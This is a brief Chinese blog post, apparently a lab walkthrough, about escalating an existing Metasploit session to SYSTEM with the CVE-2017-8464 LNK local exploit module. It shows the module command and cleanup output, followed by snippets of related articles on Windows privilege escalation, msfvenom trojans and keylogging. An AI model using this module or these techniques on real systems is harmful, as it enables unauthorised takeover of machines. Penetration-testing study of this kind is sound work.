msf之使用震网三代来提权

cve_2017_8464_lnk_lpe，他就是震网三代的exploit
上次没有成功将x64的搞定，现在搬来了震网三代
看我来个远程执行漏洞的提权
前面已经拿到shell，但没有system权限

我也是稍微找了以下exploit，真是大海捞针

偶然发现

use exploit/windows/local/cve_2017_8464_lnk_lpe

设置好sessions，直接把权限提到system

可怕，视乎还删除了什么

[!] Tried to delete C:\Users\hack\ruwkHlybgqtAAonb.dll, unknown result
[!] Tried to delete C:\Users\hack\gqSvmAVDKpXoSASr.lnk, unknown result

msf之使用震网三代来提权相关推荐

利用msf实现windows的上线与提权
环境部署攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务 ...
118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...
DVWA windows提权
环境: 域控:winser 08 域靶机:win xp,win 7 (dvwa装在win7) 攻击机:win10,kali2020 不知道从哪里提权开始那就从文件上传吧. 突然来了兴趣,对靶机进行ne ...
Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...
Windows权限提升—令牌窃取、UAC提权、进程注入等提权
Windows权限提升-令牌窃取.UNC提权.进程注入等提权 1. 前言 2. at本地命令提权 2.1. 适用范围 2.2. 命令使用 2.3. 操作步骤 2.3.1. 模拟提权 2.3.2. at ...
msf 之 webshell 提权
为什么80%的码农都做不了架构师?>>> 首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter ...
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上）
目录 1.文件交互指令 2.上传下载文件(windows) 3.屏幕截图(windows) 4.键盘记录(windows) 1.先启动记录keyscan_start 2.显示键盘输入内容keyscan ...
使用MSF进行提权（windows提权、linux提权、wesng使用）
文章目录 MSF Windows提权反弹shell 提权 END推荐阅读 MSF Linux提权反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权msf本地提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录一.LPK.DDL劫持提权 1.sethc.exe是什么: 2.lpk.dll出现的背景: 3.Windows查 ...

msf之使用震网三代来提权

msf之使用震网三代来提权相关推荐

最新文章

热门文章